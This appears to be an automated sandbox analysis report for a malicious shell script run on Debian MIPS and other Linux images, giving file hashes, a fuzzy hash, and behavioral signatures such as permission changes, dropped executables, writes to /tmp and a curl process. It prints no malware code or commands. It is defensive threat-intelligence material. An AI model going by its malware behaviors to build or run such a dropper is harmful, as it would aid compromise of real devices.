Analysis
-
max time kernel
93s -
max time network
95s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
21/10/2024, 01:29
Static task
static1
Behavioral task
behavioral1
Sample
91633f874780d83ba62e99d291a8dfadf7b2633218a23d3b5a5801c04522feb6.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
91633f874780d83ba62e99d291a8dfadf7b2633218a23d3b5a5801c04522feb6.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
91633f874780d83ba62e99d291a8dfadf7b2633218a23d3b5a5801c04522feb6.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
91633f874780d83ba62e99d291a8dfadf7b2633218a23d3b5a5801c04522feb6.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
91633f874780d83ba62e99d291a8dfadf7b2633218a23d3b5a5801c04522feb6.sh
-
Size
10KB
-
MD5
60db2d3af75facb76e7b26b1e552b902
-
SHA1
ffe87d1aca4128607117b4b3939750176984834c
-
SHA256
91633f874780d83ba62e99d291a8dfadf7b2633218a23d3b5a5801c04522feb6
-
SHA512
1cf58da38dea71b95213b99089236b11f2f8d85180e3eda12afdd4ff0c3af2c067ffe54c396526178ae292ff8c2a9cc9526f4d2e84af2883ae8e5ccda0d0c05a
-
SSDEEP
192:FaLN9Yb3+USyLey/wkruDzEJ3izEnZN9Yb3cSyLeyZJ:FafUSyLey4guDzEQzEtSyLeyf
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97